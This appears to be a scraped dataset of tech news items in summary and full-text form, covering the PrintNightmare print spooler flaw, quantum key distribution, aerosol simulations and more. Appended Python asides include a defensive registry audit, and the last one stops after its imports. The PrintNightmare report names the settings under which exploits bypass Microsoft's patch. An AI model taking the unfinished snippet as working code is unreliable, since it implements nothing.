ACM has announced the winners of the 2021 Grand Finals of its Student Research Competition (SRC), which involved 296 computer science students presenting projects at 21 ACM conferences. The University of Texas at Austin's Jiaqi Gu took first place in the graduate category for developing a method of tapping optical neural networks to facilitate efficient neuromorphic computing. Thomas B. McHugh of Northwestern University was ranked first in the undergraduate category for his project, "Constructing Agency and Usability Through Community-Driven Assistive Technology Design." Microsoft Research's Evelyne Viegas said, "The ACM Student Research Competition prepares students for the future contributions they will make. As active participants in the global research community, SRC students are given access to the world's top computing conferences that empower them to engage in dialogue and share their ideas before experts and peers."
[]
[]
[]
scitechnews
None
None
None
None
ACM has announced the winners of the 2021 Grand Finals of its Student Research Competition (SRC), which involved 296 computer science students presenting projects at 21 ACM conferences. The University of Texas at Austin's Jiaqi Gu took first place in the graduate category for developing a method of tapping optical neural networks to facilitate efficient neuromorphic computing. Thomas B. McHugh of Northwestern University was ranked first in the undergraduate category for his project, "Constructing Agency and Usability Through Community-Driven Assistive Technology Design." Microsoft Research's Evelyne Viegas said, "The ACM Student Research Competition prepares students for the future contributions they will make. As active participants in the global research community, SRC students are given access to the world's top computing conferences that empower them to engage in dialogue and share their ideas before experts and peers." New York, NY, July 8, 2021 - The winners of the 2021 Grand Finals of the Association for Computing Machinery (ACM) Student Research Competition (SRC) were recently announced, culminating a year-long competition in which 296 computer science students presented research projects at 21 ACM conferences. Jiaqi Gu, University of Texas at Austin; Konstantinos Kallas, University of Pennsylvania; and Guyue Huang, Tsinghua University took the top three places among graduate students. Thomas B. McHugh, Northwestern University; Chuangtao Chen, Zhejiang University; and Rakshit Mittal, Birla Institute of Technology & Science took the top three spots among undergraduates. Microsoft sponsors the SRC by providing travel grants of $500 to allow exemplary computing students to attend and present their research at major ACM computing conferences around the world. Through the Student Research Competition, each participating student has the unique opportunity to attend conference sessions, gain a new understanding of the practical applications of computer science scholarship, and share their own research with other students, conference attendees and eminent scientists and practitioners. For most students, the ACM Student Research Competition is their introduction to participating in premier computing research conferences. "Despite the impact of the COVID pandemic, the ACM Student Research Competition celebrated another successful year," said ACM President Gabriele Kotsis. "The SRC opens up the world of professional computing research to students. As the organizers of the competition, we are always heartened to read the testimonials students write after the competition ends. A common thread that runs through all the testimonials is that participation in the competition is a memory that will stay with them. We also offer SRC participants Student Membership to ACM, which gives these young people access to a range of essential resources for learning and career development and keeps them connected with the broader computing community. We thank our friends at Microsoft for their ongoing support of the SRC." "We congratulate the Graduate and Undergraduate winners, as well as all who participated in this year's SRC," said Evelyne Viegas, Senior Director of Global Research Engagement at Microsoft Research. "Computing has become interwoven into almost every aspect of life and business. New innovations, brought about by computing research, will play an important role in addressing the challenges we will face in the coming years. 
The ACM Student Research Competition prepares students for the future contributions they will make. As active participants in the global research community, SRC students are given access to the world's top computing conferences that empower them to engage in dialogue and share their ideas before experts and peers." Judges assess each presenter's demonstrated knowledge, the caliber of student contributions to the research and the overall quality of their oral and visual presentations. The most successful student researchers move through the competition's stages. In the first stages, their research posters and presentations are evaluated for content and presentation. During the Grand Finals, the students share a written 4,000-word description of their work before the final step of the competition, when an entirely new panel of judges evaluates each student's complete body of work and selects the overall winners. The 2021 Student Winners: Graduate Category - Jiaqi Gu (University of Texas at Austin), Konstantinos Kallas (University of Pennsylvania), and Guyue Huang (Tsinghua University); Undergraduate Category - Thomas B. McHugh (Northwestern University), Chuangtao Chen (Zhejiang University), and Rakshit Mittal (Birla Institute of Technology & Science). The ACM Student Research Competition (SRC), sponsored by Microsoft, offers a unique forum for undergraduate and graduate students to present their original research at well-known ACM-sponsored and co-sponsored conferences before a panel of judges and attendees. The SRC is a joint venture of ACM and Microsoft, which has provided generous funding of $120,000 per competition year for this event since 2003. The top three undergraduate and graduate winners at each SRC receive prizes of $500, $300, and $200 (USD), respectively, an award medal and a one-year complimentary ACM student membership with a subscription to ACM's Digital Library. ACM, the Association for Computing Machinery, is the world's largest educational and scientific computing society, uniting educators, researchers and professionals to inspire dialogue, share resources and address the field's challenges. ACM strengthens the computing profession's collective voice through strong leadership, promotion of the highest standards, and recognition of technical excellence. ACM supports the professional growth of its members by providing opportunities for life-long learning, career development, and professional networking.
152
Microsoft's Emergency Patch Fails to Fix Critical 'PrintNightmare' Vulnerability
An emergency patch Microsoft issued on Tuesday fails to fully fix a critical security vulnerability in all supported versions of Windows that allows attackers to take control of infected systems and run code of their choice, researchers said. The threat, colloquially known as PrintNightmare, stems from bugs in the Windows print spooler, which provides printing functionality inside local networks. Proof-of-concept exploit code was publicly released and then pulled back, but not before others had copied it. Researchers track the vulnerability as CVE-2021-34527. Attackers can exploit it remotely when print capabilities are exposed to the Internet. Attackers can also use it to escalate system privileges once they've used a different vulnerability to gain a toe-hold inside of a vulnerable network. In either case, the adversaries can then gain control of the domain controller, which as the server that authenticates local users, is one of the most security-sensitive assets on any Windows network. "It's the biggest deal I've dealt with in a very long time," said Will Dormann, a senior vulnerability analyst at the CERT Coordination Center, a nonprofit, United States federally funded project that researches software bugs and works with business and government to improve security. "Any time there's public exploit code for an unpatched vulnerability that can compromise a Windows domain controller, that's bad news." After the severity of the bug came to light, Microsoft published an out-of-band fix on Tuesday. Microsoft said the update "fully addresses the public vulnerability." But on Wednesday - a little more than 12 hours after the release - a researcher showed how exploits could bypass the patch. "Dealing with strings & filenames is hard," Benjamin Delpy, a developer of the hacking and network utility Mimikatz and other software, wrote on Twitter . Accompanying Delpy's tweet was a video that showed a hastily written exploit working against a Windows Server 2019 that had installed the out-of-band patch. The demo shows that the update fails to fix vulnerable systems that use certain settings for a feature called point and print , which makes it easier for network users to obtain the printer drivers they need. Buried near the bottom of Microsoft's advisory from Tuesday is the following: "Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible." The incomplete patch is the latest gaffe involving the PrintNightmare vulnerability. Last month, Microsoft's monthly patch batch fixed CVE-2021-1675 , a print spooler bug that allowed hackers with limited system rights on a machine to escalate privilege to administrator. Microsoft credited Zhipeng Huo of Tencent Security, Piotr Madej of Afine, and Yunhai Zhang of Nsfocus with discovering and reporting the flaw. A few weeks later, two different researchers - Zhiniang Peng and Xuefeng Li from Sangfor - published an analysis of CVE-2021-1675 that showed it could be exploited not just for privilege escalation but also for achieving remote code execution. The researchers named their exploit PrintNightmare. Eventually, researchers determined that PrintNightmare exploited a vulnerability that was similar (but ultimately different from) CVE-2021-1675. Zhiniang Peng and Xuefeng Li removed their proof-of-concept exploit when they learned of the confusion, but by then, their exploit was already widely circulating. 
There are currently at least three PoC exploits publicly available, some with capabilities that go well beyond what the initial exploit allowed. Microsoft's fix protects Windows servers that are set up as domain controllers or Windows 10 devices that use default settings. Wednesday's demo from Delpy shows that PrintNightmare works against a much wider range of systems, including those that have enabled the Point and Print feature and selected the NoWarningNoElevationOnInstall option. The researcher implemented the exploit in Mimikatz. Besides trying to close the code-execution vulnerability, Tuesday's fix for CVE-2021-34527 also installs a new mechanism that allows Windows administrators to implement stronger restrictions when users try to install printer software. "Prior to installing the July 6, 2021, and newer Windows Updates containing protections for CVE-2021-34527, the printer operators' security group could install both signed and unsigned printer drivers on a printer server," a Microsoft advisory stated. "After installing such updates, delegated admin groups like printer operators can only install signed printer drivers. Administrator credentials will be required to install unsigned printer drivers on a printer server going forward." Despite Tuesday's out-of-band patch being incomplete, it still provides meaningful protection against many types of attacks that exploit the print spooler vulnerability. So far, no researchers have reported that installing it puts systems at risk. Unless that changes, Windows users should install both the June patch and Tuesday's patch and await further instructions from Microsoft. Company representatives didn't immediately have a comment for this post.
Researchers warn a software patch Microsoft issued this week did not fully correct a flaw in all supported versions of the Windows operating system that allows hackers to commandeer infected networks. The PrintNightmare vulnerability is rooted in bugs in the Windows print spooler, which supports printing functionality in local networks, and which attackers can exploit remotely when print capabilities are exposed online. Hackers also can use the flaw to escalate system privileges once they have infiltrated a vulnerable network via another bug, hijacking the domain controller. Benjamin Delpy, a developer of the hacking and network utility Mimikatz, tweeted that exploits could circumvent Microsoft's out-of-band update, which fails to fix vulnerable systems that employ certain settings for the point and print feature.
[]
[]
[]
scitechnews
None
None
None
None
Researchers warn a software patch Microsoft issued this week did not fully correct a flaw in all supported versions of the Windows operating system that allows hackers to commandeer infected networks. The PrintNightmare vulnerability is rooted in bugs in the Windows print spooler, which supports printing functionality in local networks, and which attackers can exploit remotely when print capabilities are exposed online. Hackers also can use the flaw to escalate system privileges once they have infiltrated a vulnerable network via another bug, hijacking the domain controller. Benjamin Delpy, a developer of the hacking and network utility Mimikatz, tweeted that exploits could circumvent Microsoft's out-of-band update, which fails to fix vulnerable systems that employ certain settings for the point and print feature. An emergency patch Microsoft issued on Tuesday fails to fully fix a critical security vulnerability in all supported versions of Windows that allows attackers to take control of infected systems and run code of their choice, researchers said. The threat, colloquially known as PrintNightmare, stems from bugs in the Windows print spooler, which provides printing functionality inside local networks. Proof-of-concept exploit code was publicly released and then pulled back, but not before others had copied it. Researchers track the vulnerability as CVE-2021-34527. Attackers can exploit it remotely when print capabilities are exposed to the Internet. Attackers can also use it to escalate system privileges once they've used a different vulnerability to gain a toe-hold inside of a vulnerable network. In either case, the adversaries can then gain control of the domain controller, which as the server that authenticates local users, is one of the most security-sensitive assets on any Windows network. "It's the biggest deal I've dealt with in a very long time," said Will Dormann, a senior vulnerability analyst at the CERT Coordination Center, a nonprofit, United States federally funded project that researches software bugs and works with business and government to improve security. "Any time there's public exploit code for an unpatched vulnerability that can compromise a Windows domain controller, that's bad news." After the severity of the bug came to light, Microsoft published an out-of-band fix on Tuesday. Microsoft said the update "fully addresses the public vulnerability." But on Wednesday - a little more than 12 hours after the release - a researcher showed how exploits could bypass the patch. "Dealing with strings & filenames is hard," Benjamin Delpy, a developer of the hacking and network utility Mimikatz and other software, wrote on Twitter . Accompanying Delpy's tweet was a video that showed a hastily written exploit working against a Windows Server 2019 that had installed the out-of-band patch. The demo shows that the update fails to fix vulnerable systems that use certain settings for a feature called point and print , which makes it easier for network users to obtain the printer drivers they need. Buried near the bottom of Microsoft's advisory from Tuesday is the following: "Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible." The incomplete patch is the latest gaffe involving the PrintNightmare vulnerability. 
Last month, Microsoft's monthly patch batch fixed CVE-2021-1675, a print spooler bug that allowed hackers with limited system rights on a machine to escalate privilege to administrator. Microsoft credited Zhipeng Huo of Tencent Security, Piotr Madej of Afine, and Yunhai Zhang of Nsfocus with discovering and reporting the flaw. A few weeks later, two different researchers - Zhiniang Peng and Xuefeng Li from Sangfor - published an analysis of CVE-2021-1675 that showed it could be exploited not just for privilege escalation but also for achieving remote code execution. The researchers named their exploit PrintNightmare. Eventually, researchers determined that PrintNightmare exploited a vulnerability that was similar to (but ultimately different from) CVE-2021-1675. Zhiniang Peng and Xuefeng Li removed their proof-of-concept exploit when they learned of the confusion, but by then, their exploit was already widely circulating. There are currently at least three PoC exploits publicly available, some with capabilities that go well beyond what the initial exploit allowed. Microsoft's fix protects Windows servers that are set up as domain controllers or Windows 10 devices that use default settings. Wednesday's demo from Delpy shows that PrintNightmare works against a much wider range of systems, including those that have enabled the Point and Print feature and selected the NoWarningNoElevationOnInstall option. The researcher implemented the exploit in Mimikatz. Besides trying to close the code-execution vulnerability, Tuesday's fix for CVE-2021-34527 also installs a new mechanism that allows Windows administrators to implement stronger restrictions when users try to install printer software. "Prior to installing the July 6, 2021, and newer Windows Updates containing protections for CVE-2021-34527, the printer operators' security group could install both signed and unsigned printer drivers on a printer server," a Microsoft advisory stated. "After installing such updates, delegated admin groups like printer operators can only install signed printer drivers. Administrator credentials will be required to install unsigned printer drivers on a printer server going forward." Despite Tuesday's out-of-band patch being incomplete, it still provides meaningful protection against many types of attacks that exploit the print spooler vulnerability. So far, no researchers have reported that installing it puts systems at risk. Unless that changes, Windows users should install both the June patch and Tuesday's patch and await further instructions from Microsoft. Company representatives didn't immediately have a comment for this post.
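As a practical aside, the Point and Print settings that Delpy's demo relies on live in the Windows registry, and Microsoft's guidance for CVE-2021-34527 at the time pointed administrators at two values under the PointAndPrint policy key. The sketch below is a hedged illustration of how one might audit those values with Python's standard winreg module; the key path and value names reflect the guidance as reported at the time and should be re-verified against Microsoft's current advisory.

# Hedged sketch: read the Point and Print policy values that Microsoft's
# CVE-2021-34527 guidance highlighted. Windows-only (uses the winreg module);
# a missing value is treated as "not configured".
import winreg

KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
VALUES = ("NoWarningNoElevationOnInstall", "UpdatePromptSettings")

def read_point_and_print():
    settings = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY) as key:
            for name in VALUES:
                try:
                    value, _type = winreg.QueryValueEx(key, name)
                    settings[name] = value
                except FileNotFoundError:
                    settings[name] = None      # value not configured
    except FileNotFoundError:
        return {name: None for name in VALUES}  # policy key absent entirely
    return settings

if __name__ == "__main__":
    for name, value in read_point_and_print().items():
        # Per the guidance at the time, a value of 1 weakens the local security posture.
        flag = "(review this setting)" if value == 1 else ""
        print(f"{name} = {value} {flag}")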
153
Facebook, Twitter, Google Threaten to Quit Hong Kong Over Proposed Data Laws
Facebook, Twitter, and Google have privately threatened to halt service to Hong Kong if the city's government revises data-protection ordinances that could make the companies liable for doxing, or malicious online sharing of individuals' information. The Singapore-based Asia Internet Coalition, which the Internet firms are members of, expressed concern the proposed rules' vague language could subject their employees to criminal investigations or prosecution for doxing by their users. "The only way to avoid these sanctions for technology companies would be to refrain from investing and offering the services in Hong Kong," states a letter from the Coalition. The letter further said the proposed revisions could curtail free expression and outlaw even "innocent acts of sharing information online."
[]
[]
[]
scitechnews
None
None
None
None
Facebook, Twitter, and Google have privately threatened to halt service to Hong Kong if the city's government revises data-protection ordinances that could make the companies liable for doxing, or malicious online sharing of individuals' information. The Singapore-based Asia Internet Coalition, which the Internet firms are members of, expressed concern the proposed rules' vague language could subject their employees to criminal investigations or prosecution for doxing by their users. "The only way to avoid these sanctions for technology companies would be to refrain from investing and offering the services in Hong Kong," states a letter from the Coalition. The letter further said the proposed revisions could curtail free expression and outlaw even "innocent acts of sharing information online."
154
Untappable Communication Becomes Practical with MDI-QKD System in Future Quantum Internet
Slater: "A major advantage of our system over other QKD systems is its scaling to many users. Our MDI-QKD can be used in a star-type physical network. Researchers at QuTech have already previously performed the first proof-of-principle demonstration of MDI-QKD, the first demonstration over deployed fibres, and the first demonstration using cost-effective, off-the-shelf hardware."
Engineers at the QuTech institute created by the Delft University of Technology (TU Delft) and the Netherlands Organization for Applied Scientific Research have devised a cost-scalable system for untappable communication. TU Delft's Joshua Slater said the measurement-device independent quantum key distribution (MDI-QKD) system enables the connection of multiple users through a central node that functions like a switchboard operator. Said Slater, "The entire system is designed such that hacking attacks against the central node cannot break the security of the protocol." He also said QuTech researchers have facilitated a proof-of-principle demonstration of MDI-QKD, as well as demonstrations of its capabilities over deployed optical fibers and commercially available hardware.
[]
[]
[]
scitechnews
None
None
None
None
Engineers at the QuTech institute created by the Delft University of Technology (TU Delft) and the Netherlands Organization for Applied Scientific Research have devised a cost-scalable system for untappable communication. TU Delft's Joshua Slater said the measurement-device independent quantum key distribution (MDI-QKD) system enables the connection of multiple users through a central node that functions like a switchboard operator. Said Slater, "The entire system is designed such that hacking attacks against the central node cannot break the security of the protocol." He also said QuTech researchers have facilitated a proof-of-principle demonstration of MDI-QKD, as well as demonstrations of its capabilities over deployed optical fibers and commercially available hardware. Slater: "A major advantage of our system over other QKD systems is its scaling to many users. Our MDI-QKD can be used in a star-type physical network. Researchers at QuTech have already previously performed the first proof-of-principle demonstration of MDI-QKD, the first demonstration over deployed fibres, and the first demonstration using cost-effective, off-the-shelf hardware."
155
Giant 3D Cat Takes Over One of Tokyo's Biggest Billboards
One of the largest billboards in Tokyo is displaying a hyper-realistic three-dimensional (3D) cat in 4K resolution. The gigantic feline is projected moving around on a 1,664-sq.-ft. (155-square-meter) curved light-emitting diode (LED) screen overlooking a railway station in the city's Shinjuku district. The Shinjuku cat, airing between 7 a.m. and 1 a.m., is a test broadcast for a display that officially opens July 12. The Cross Shinjuku Vision billboard's owners said the 3D effect of the display can diminish depending on the viewing angle. One of the companies that organized the display, Cross Space, has begun livestreaming a view of the billboard on online video service YouTube.
[]
[]
[]
scitechnews
None
None
None
None
One of the largest billboards in Tokyo is displaying a hyper-realistic three-dimensional (3D) cat in 4K resolution. The gigantic feline is projected moving around on a 1,664-sq.-ft. (155-square-meter) curved light-emitting diode (LED) screen overlooking a railway station in the city's Shinjuku district. The Shinjuku cat, airing between 7 a.m. and 1 a.m., is a test broadcast for a display that officially opens July 12. The Cross Shinjuku Vision billboard's owners said the 3D effect of the display can diminish depending on the viewing angle. One of the companies that organized the display, Cross Space, has begun livestreaming a view of the billboard on online video service YouTube.
156
Europe to Launch 2-Handed Robotic Arm to the International Space Station
The European Robotic Arm, developed by Airbus for the European Space Agency, is scheduled to be flown to the International Space Station on July 15 with the new Russian Multipurpose Laboratory Module. The autonomous robotic arm features dexterous hands attached to two symmetrical arms, each just over 16 feet (just under 5 meters) long. Made of lightweight aluminum and carbon fiber, the arm can install components weighing up to 17,600 pounds, reach targets with 5-millimeter precision, and transport astronauts from one work site to another during spacewalks. It also is equipped with an infrared camera that can be used to inspect the exterior of the space station and stream video to the astronauts inside. The arm can be controlled by the astronauts in real time, or autonomously perform pre-programmed tasks.
[]
[]
[]
scitechnews
None
None
None
None
The European Robotic Arm, developed by Airbus for the European Space Agency, is scheduled to be flown to the International Space Station on July 15 with the new Russian Multipurpose Laboratory Module. The autonomous robotic arm features dexterous hands attached to two symmetrical arms, each just over 16 feet (just under 5 meters) long. Made of lightweight aluminum and carbon fiber, the arm can install components weighing up to 17,600 pounds, reach targets with 5-millimeter precision, and transport astronauts from one work site to another during spacewalks. It also is equipped with an infrared camera that can be used to inspect the exterior of the space station and stream video to the astronauts inside. The arm can be controlled by the astronauts in real time, or autonomously perform pre-programmed tasks.
157
The Tech Cold War's 'Most Complicated Machine' That's Out of China's Reach
Manufacturers can't produce leading-edge chips without the system, and "it is only made by the Dutch firm ASML," said Will Hunt, a research analyst at Georgetown University's Center for Security and Emerging Technology, which has concluded that it would take China at least a decade to build its own similar equipment. "From China's perspective, that is a frustrating thing."
A Dutch company's computer-chip manufacturing system has become a point of leverage in the U.S.-Chinese competition for global dominance in the computer industry. ASML Holding's $150-million-plus system defines ultrasmall circuitry on leading-edge chips with extreme ultraviolet light to boost performance. ASML's machine also requires development and assembly across three continents, making any country's ambitions to build a totally self-sufficient semiconductor supply chain unrealistic. The system uses mirrors made by Germany's Zeiss optics firm and other hardware by San Diego-based Cymer; Japanese companies provide critical chemicals and photomasks. The Biden administration appears likely to uphold the previous administration's embargo on selling ASML equipment to China.
[]
[]
[]
scitechnews
None
None
None
None
A Dutch company's computer-chip manufacturing system has become a point of leverage in the U.S.-Chinese competition for global dominance in the computer industry. ASML Holding's $150-million-plus system defines ultrasmall circuitry on leading-edge chips with extreme ultraviolet light to boost performance. ASML's machine also requires development and assembly across three continents, making any country's ambitions to build a totally self-sufficient semiconductor supply chain unrealistic. The system uses mirrors made by Germany's Zeiss optics firm and other hardware by San Diego-based Cymer; Japanese companies provide critical chemicals and photomasks. The Biden administration appears likely to uphold the previous administration's embargo on selling ASML equipment to China. Manufacturers can't produce leading-edge chips without the system, and "it is only made by the Dutch firm ASML," said Will Hunt, a research analyst at Georgetown University's Center for Security and Emerging Technology, which has concluded that it would take China at least a decade to build its own similar equipment. "From China's perspective, that is a frustrating thing."
158
Simulation of Air Flow After Coughing, Sneezing to Study the Transmission of Diseases Such as COVID-19
By the beginning of April 2021, the number of people infected during the COVID-19 pandemic had risen to more than 130 million, of whom more than 2.8 million had died. The SARS-CoV-2 virus responsible for COVID-19 is transmitted particularly by droplets or aerosols emitted when an infected person speaks, sneezes or coughs. This is how the viruses and other pathogens spread through the environment and transmit infectious diseases when they are inhaled by someone else. The capacity of these particles to remain suspended in the air and to spread in the environment depends largely on the size and nature of the air flow generated by the expiration of air. As with other airborne infectious diseases such as tuberculosis, the common flu or measles, the role played by fluid dynamics is key to predicting the risk of infection by inhaling these particles in suspension. In a coughing event that lasts for 0.4 seconds and has a maximum exhaled air speed of 4.8 m/s, the flow first generates a turbulent stream of air that is hotter and more humid than that of the environment. Once the expiration is over, the stream turns into a puff of air that rises because of buoyancy while it dissipates. The particles transported by this flow form clouds, the trajectories of which depend on their size. The dynamics of the largest particles are governed by gravity and describe parabolas with a clear horizontal limit. Despite their limited ability to remain in suspension and their limited horizontal range, the viral load can be high because they are large (diameters larger than 50 microns). In contrast, the smallest particles (with diameters smaller than 50 microns) are transported by the action of air flow. These aerosols are capable of remaining in suspension for longer times and they spread over a greater area. The largest particles remain in the air for a few seconds while the smallest can remain suspended for up to a few minutes. Even though their viral load is smaller, these aerosols can get through face masks and be moved from room to room, for example, through ventilation systems. The retention percentage of face masks decreases as the particles get smaller. The behaviour of the particle cloud depends on the size of the particles and can be complicated by the effects of evaporation, which gradually reduces the diameter of the droplets. An accompanying video shows the results of the numerical simulation of aerosol dispersion produced by a sneeze. Particles are expelled during the expiration of air and are mainly transported by the action of moving air and gravity. To evaluate the impact of the evaporation of the aqueous fraction, which reduces the size of the particles, the transport of aerosols that had not evaporated (left-hand panel) was compared with those that had evaporated (right-hand panel). The colour shows the evaporated water fraction between 0 and 1 for no evaporation and total evaporation, respectively. With the support of the Consortium of University Services of Catalonia, the research group from the URV's Department of Mechanical Engineering, led by Alexandre Fabregat and Jordi Pallarés, in conjunction with researchers from Utah State University and the University of Illinois, has used high-performance numerical simulations to study in unprecedented detail the process of aerosol dispersion generated by a cough or a sneeze. The level of detail was so high that they needed considerable computing power and numerous processors of a supercomputer working at the same time.
The results indicate that the plume of air produced by the expiration carries particles of less than 32 microns above the height of emission, which generates a cloud that has a great capacity to remain in suspension and be dispersed by air currents over a significant distance. The largest particles have a limited range, which is not changed by evaporation during their fall to the ground. Assuming typical viral loads for infectious diseases, the results were used to draw a map of the concentration of viral particles around the infected person after they had coughed or sneezed. This research has been published as two scientific articles in the journal Physics of Fluids with the titles "Direct numerical simulation of the turbulent flow generated during a violent expiratory event" and "Direct numerical simulation of turbulent dispersion of evaporative aerosol clouds produced by an intense expiratory event." Both articles were featured on the front cover because of their scientific impact. References: Alexandre Fabregat, Ferran Gisbert, Anton Vernet, Som Dutta, Ketan Mittal, and Jordi Pallarès, "Direct numerical simulation of the turbulent flow generated during a violent expiratory event," Physics of Fluids 33, 035122 (2021), https://doi.org/10.1063/5.0042086; Alexandre Fabregat, Ferran Gisbert, Anton Vernet, Josep Anton Ferré, Ketan Mittal, Som Dutta, and Jordi Pallarès, "Direct numerical simulation of turbulent dispersion of evaporative aerosol clouds produced by an intense expiratory event," Physics of Fluids 33, 033329 (2021), https://doi.org/10.1063/5.0045416
Researchers at Spain's Universitat Rovira i Virgili (URV) simulated air flow from coughing and sneezing using high-performance computation systems to better understand the airborne spread of diseases like COVID-19. The researchers found the air plume generated by a cough or sneeze carries particles smaller than 32 microns higher than the height of emission, producing a cloud that can remain suspended and dispersed by air currents over long distances. The researchers used the results of the simulations to develop a map of the concentration of viral particles around an infected person following a cough or sneeze.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at Spain's Universitat Rovira i Virgili (URV) simulated air flow from coughing and sneezing using high-performance computation systems to better understand the airborne spread of diseases like COVID-19. The researchers found the air plume generated by a cough or sneeze carries particles smaller than 32 microns higher than the height of emission, producing a cloud that can remain suspended and dispersed by air currents over long distances. The researchers used the results of the simulations to develop a map of the concentration of viral particles around an infected person following a cough or sneeze. By the beginning of April 2021, the number of people infected during the COVID-19 pandemic had risen to more than 130 million, of whom more than 2.8 million had died. The SARS-CoV-2 virus responsible for COVID-19 is transmitted particularly by droplets or aerosols emitted when an infected person speaks, sneezes or coughs. This is how the viruses and other pathogens spread through the environment and transmit infectious diseases when they are inhaled by someone else. The capacity of these particles to remain suspended in the air and to spread in the environment depends largely on the size and nature of the air flow generated by the expiration of air. As with other airborne infectious diseases such as tuberculosis, the common flu or measles, the role played by fluid dynamics is key to predicting the risk of infection by inhaling these particles in suspension. In a coughing event that lasts for 0.4 seconds and has a maximum exhaled air speed of 4.8 m/s, the flow first generates a turbulent stream of air that is hotter and more humid than that of the environment. Once the expiration is over, the stream turns into a puff of air that rises because of buoyancy while it dissipates. The particles transported by this flow form clouds, the trajectories of which depend on their size. The dynamics of the largest particles are governed by gravity and describe parabolas with a clear horizontal limit. Despite their limited ability to remain in suspension and their limited horizontal range, the viral load can be high because they are large (diameters larger than 50 microns). In contrast, the smallest particles (with diameters smaller than 50 microns) are transported by the action of air flow. These aerosols are capable of remaining in suspension for longer times and they spread over a greater area. The largest particles remain in the air for a few seconds while the smallest can remain suspended for up to a few minutes. Even though their viral load is smaller, these aerosols can get through face masks and be moved from room to room, for example, through ventilation systems. The retention percentage of face masks decreases as the particles get smaller. The behaviour of the particle cloud depends on the size of the particles and can be complicated by the effects of evaporation, which gradually reduces the diameter of the droplets. An accompanying video shows the results of the numerical simulation of aerosol dispersion produced by a sneeze. Particles are expelled during the expiration of air and are mainly transported by the action of moving air and gravity. To evaluate the impact of the evaporation of the aqueous fraction, which reduces the size of the particles, the transport of aerosols that had not evaporated (left-hand panel) was compared with those that had evaporated (right-hand panel).
The colour shows the evaporated water fraction between 0 and 1 for no evaporation and total evaporation, respectively. With the support of the Consortium of University Services of Catalonia, the research group from the URV's Department of Mechanical Engineering, led by Alexandre Fabregat and Jordi Pallarés, in conjunction with researchers from Utah State University and the University of Illinois, has used high-performance numerical simulations to study in unprecedented detail the process of aerosol dispersion generated by a cough or a sneeze. The level of detail was so high that they needed considerable calculation power and numerous processors of a supercomputer working at the same time. The results indicate that the plume of air produced by the expiration carries particles of less than 32 microns above the height of emission, which generates a cloud that has a great capacity to remain in suspension and be dispersed by air currents over a significant distance. The largest particles have a limited scope which is not changed by the effect of evaporation during the displacement to the ground. Assuming typical viral loads for infectious diseases, the results were used to draw a map of the concentration of viral particles around the infected person after they had coughed or sneezed. This research has been published as two scientific articles in the journal Physics of Fluids with the titles "Direct numerical simulation of the turbulent flow generated during a violent expiratory event" and "Direct numerical simulation of turbulent dispersion of evaporative aerosol clouds produced by an intense expiratory event." Both articles were featured on the front cover because of their scientific impact. References: Alexandre Fabregat, Ferran Gisbert, Anton Vernet, Som Dutta, Ketan Mittal, and Jordi Pallarès, "Direct numerical simulation of the turbulent flow generated during a violent expiratory event," Physics of Fluids 33, 035122 (2021) https://doi.org/10.1063/5.0042086 Alexandre Fabregat, Ferran Gisbert, Anton Vernet, Josep Anton Ferré, Ketan Mittal, Som Dutta, and Jordi Pallarès, "Direct numerical simulation of turbulent dispersion of evaporative aerosol clouds produced by an intense expiratory event," Physics of Fluids 33, 033329 (2021) https://doi.org/10.1063/5.0045416
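The size dependence described above can be made concrete with a back-of-the-envelope calculation. The following Python sketch is not part of the URV simulations, which rely on direct numerical simulation on a supercomputer; it simply applies the standard Stokes settling-velocity formula to droplets of several diameters and an assumed release height of 1.5 m, to show why droplets of around 100 microns reach the ground in seconds while droplets of a few tens of microns can stay aloft for minutes.

# Rough Stokes-law estimate of how long respiratory droplets stay airborne in still air.
RHO_DROPLET = 1000.0      # kg/m^3, roughly water
RHO_AIR = 1.2             # kg/m^3
MU_AIR = 1.8e-5           # Pa*s, dynamic viscosity of air
G = 9.81                  # m/s^2
RELEASE_HEIGHT = 1.5      # m, assumed mouth height

def settling_velocity(diameter_m):
    # Terminal settling velocity for a small sphere: v = (rho_p - rho_a) * g * d^2 / (18 * mu)
    return (RHO_DROPLET - RHO_AIR) * G * diameter_m ** 2 / (18.0 * MU_AIR)

for d_um in (10, 32, 50, 100):
    v = settling_velocity(d_um * 1e-6)
    print(f"{d_um:>3} um droplet: settles at {v * 100:.2f} cm/s, "
          f"about {RELEASE_HEIGHT / v:.0f} s to fall {RELEASE_HEIGHT} m in still air")

On these rough numbers a 100-micron droplet reaches the floor in about five seconds, while a 10-micron droplet takes several minutes and settles far more slowly than the centimetres-per-second air speeds in the buoyant puff, which is broadly consistent with the behaviour described above. The estimate ignores evaporation and air currents and is only approximate for the largest droplets.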
159
Data Security Rules Instituted for U.S. Payment Processing System
New data security rules governing the payment system that facilitates direct deposits and direct payments for nearly all U.S. bank and credit union accounts are now in effect. The National Automated Clearinghouse Association (NACHA) stipulates that an account number used for any Automated Clearinghouse (ACH) payment must be rendered indecipherable while stored electronically. This mandate is applicable to any facility where account numbers related to ACH entries are stored. NACHA has instructed ACH originators and third parties that process over 6 million ACH transactions annually to render deposit account data unreadable when stored electronically, recommending measures that include encryption, truncation, tokenization, and destruction. The regulator said access controls like passwords are unacceptable, but disk encryption is permitted, provided additional and prescribed physical safeguards are implemented.
[]
[]
[]
scitechnews
None
None
None
None
New data security rules governing the payment system that facilitates direct deposits and direct payments for nearly all U.S. bank and credit union accounts are now in effect. The National Automated Clearinghouse Association (NACHA) stipulates that an account number used for any Automated Clearinghouse (ACH) payment must be rendered indecipherable while stored electronically. This mandate is applicable to any facility where account numbers related to ACH entries are stored. NACHA has instructed ACH originators and third parties that process over 6 million ACH transactions annually to render deposit account data unreadable when stored electronically, recommending measures that include encryption, truncation, tokenization, and destruction. The regulator said access controls like passwords are unacceptable, but disk encryption is permitted, provided additional and prescribed physical safeguards are implemented.
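The Nacha rule describes an outcome, account numbers rendered unreadable at rest, rather than a specific mechanism. As a purely illustrative Python sketch of two of the approaches named above, truncation and tokenization, the example below masks an account number for display and derives a keyed token instead of storing the clear number; the key handling, token format, and account number are assumptions for the example, not requirements of the rule.

import hmac, hashlib, os

# Key management is out of scope for this illustration; real deployments typically
# use an HSM or a token vault rather than an environment variable.
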